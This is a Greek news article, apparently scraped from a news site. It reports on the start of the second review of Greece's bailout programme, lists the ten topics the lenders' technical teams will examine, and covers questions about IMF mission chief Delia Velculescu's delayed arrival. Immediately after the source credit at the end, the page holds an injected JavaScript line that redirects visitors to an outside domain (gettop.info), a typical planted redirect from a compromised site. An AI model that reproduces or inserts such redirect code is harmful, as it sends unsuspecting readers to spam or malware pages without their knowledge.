Yπό τη «σκιά» του ΔΝΤ και της… καθυστέρησης της Βελκουλέσκου ξεκινά η β΄αξιολόγηση

0
9

 

Μέσα στην εβδομάδα αναμένεται να ξεκινήσει η δεύτερη αξιολόγηση του ελληνικού προγράμματος, ενώ «σκιές» ρίχνει η ενημέρωση μέσω email της Ντέλιας Βελκουλέσκου ότι θα καθυστερήσει την άφιξη της στη χώρας μας και αντί της Δευτέρας θα καταφθάσει προς το τέλος της εβδομάδας.

Όπως αναφέρει το enikonomia.gr τα τεχνικά κλιμάκια των θεσμών φτάνουν στην Αθήνα για να προετοιμάσουν το έδαφος για την αξιολόγηση που θα επικεντρωθεί στα 10 από τα πιο βασικά θέματα:

1. Την προσπάθεια επίτευξης των δημοσιονομικών στόχων για το 2016 και το 2017. Στο κεφάλαιο αυτό, η ομάδα των τεχνοκρατών θα ελέγξει έσοδα, δαπάνες, την πορεία των οικονομικών ασφαλιστικών ταμείων, δημόσιων νοσοκομείων, ΟΤΑ αλλά και το πρόγραμμα εξόφλησης ληξιπρόθεσμων οφειλών του δημοσίου.

2. Τα εργασιακά και την προετοιμασία που έχει γίνει για την επαναφορά των συλλογικών συμβάσεων εργασίας και τα σχέδια του υπουργείου για τον κατώτερο μισθό, τις ομαδικές απολύσεις και την αλλαγή του συνδικαλιστικού νόμου.

3. Την συνέχιση του ασφαλιστικού με τις δομές για την είσπραξη των επιπλέον εισφορών που θα επιβληθούν από 1/1/2017 σε ελεύθερους επαγγελματίες και βεβαίως την σύσταση και λειτουργία του νέου ασφαλιστικού υπερταμείου κύριας ασφάλισης, του γνωστού πλέον ΕΦΚΑ.

4. Το πλήρες σχέδιο για την εξοικονόμηση πόρων ύψους 700 εκ. ευρώ από κοινωνικά επιδόματα, με στόχο την καθολική εφαρμογή του Κοινωνικού Εισοδήματος Αλληλεγγύης (ΚΕΑ), όπως μετονομάστηκε το ελάχιστο εγγυημένο εισόδημα.

5. Το νομοσχέδιο για τον εξωδικαστικό μηχανισμό επίλυσης διαφορών για τα κόκκινα επιχειρηματικά δάνεια και το χρονοδιάγραμμα για την αναμόρφωση του νόμου Κατσέλη.

6. Την ετοιμότητα της ΤτΕ και τεσσάρων συστημικών τραπεζών, να προχωρήσουν άμεσα στην εκκαθάριση κόκκινων δανείων. Το βασικό θέμα θα είναι πότε θα έχουν συγκροτηθεί ως σώμα τα νέα ΔΣ των τεσσάρων μεγάλων τραπεζών και του ΤΧΣ και ποιες θα είναι οι πρώτες κινήσεις για τα κόκκινα δάνεια.

7. Τις αλλαγές στο δημόσιο. Εδώ τα τεχνικά κλιμάκια θα θελήσουν να ενημερωθούν από τα συναρμόδια υπουργεία, για την αναμόρφωση των ειδικών μισθολογίων, την αξιολόγηση του δημοσίου τομέα και το πρόγραμμα μόνιμης κινητικότητας για τους υπαλλήλους.

8. Την σύσταση και την λειτουργία του νέου υπερταμείου αποκρατικοποιήσεων και το χρονοδιάγραμμα του ορισμού διοίκησης, δημιουργίας της Εταιρίας Δημοσίων Συμμετοχών (ΕΔΗΣ ΑΕ) και το πλάνο μέχρι το νέο ταμείο που θα περιλαμβάνει το ΤΑΙΠΕΔ, το ΤΧΣ, την ΕΤΑΔ και την ΕΔΗΣ, να καταστεί πλήρως λειτουργικό.

9. Την πορεία του μετασχηματισμού της ΓΓΔΕ σε ανεξάρτητη αρχή εσόδων αφού θα πρέπει εκτός από το νομοθετικό πλαίσιο να οριστικοποιηθεί το διοικητικό πλάνο και ο προϋπολογισμός της νέας ανεξάρτητης υπηρεσίας.

10. Την προεργασία που έχει γίνει από το ΥΠΑΝ για την επόμενη φάση στο άνοιγμα των κλειστών επαγγελμάτων και την βελτίωση του επιχειρηματικού κλίματος.

Ερωτήματα για την καθυστέρηση Βελκουλέσκου

Παρά το γεγονός ότι η αξιολόγηση ξεκινά κανονικά με την συλλογή στοιχείων από τα κλιμάκια των θεσμών, ερωτηματικά προκάλεσε στην Αθήνα το e-mail της επικεφαλής της ομάδας του ΔΝΤ Ντέλιας Βελκουλέσκου, η οποία επικαλούμενη προσωπικούς λόγους, ενημέρωνε ότι δεν μπορεί να βρεθεί στην Αθήνα πριν από την Πέμπτη.

Κύκλοι που παρακολουθούν κοντά τη διαπραγμάτευση μιλούσαν για την ανάγκη της κ. Βελκουλέσκου, να είναι παρούσα στην κηδεία στελέχους του ΔΝΤ πριν επιστρέψει στην Αθήνα. Παρόλα αυτά κυβερνητικοί κύκλοι εξέφραζαν τις προηγούμενες μέρες ερωτηματικά για το αν είναι αυτή η πραγματική αιτία της καθυστέρησης.

Πάντως εκτιμάται ότι οι εκπρόσωποι των άλλων τριών θεσμών οι Ντέκλαν Κοστέλο (ΕΕ), Μάσιμο Ντρούντι (ΕΚΤ) και Νικόλα Τζαιαμαριόλι (ΕΜΣ) αναμένεται να βρεθούν στην Αθήνα στα μέσα της εβδομάδας, ώστε την Πέμπτη ή την Παρασκευή να γίνει και η εισαγωγική συνάντηση με το οικονομικό επιτελείο.

Την ίδια ώρα η Κομισιόν ανέφερε ότι: κατά το Εurogroup της περασμένης Δευτέρας, ανακοινώθηκε ότι η 2η αξιολόγηση θα ξεκινούσε στις 18/10 ημέρα Τρίτη, με την άφιξη των τεχνικών κλιμακίων και, όπως πάντα, με την άφιξη των επικεφαλής λίγες μέρες μετά, στο τέλος της εβδομάδας.

Οι επικεφαλής, όπως λένε, είχε ανακοινωθεί πως θα έπιαναν δουλειά από την επόμενη εβδομάδα. Επίσης σημειώνουν ότι δεν υπάρχει καθυστέρηση, όλα εκτελούνται ακριβώς με το πρόγραμμα που ανακοινώθηκε στις 07/10 και δεν υπάρχει καμία αλλαγή.

 

Πηγή: enikonomia.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here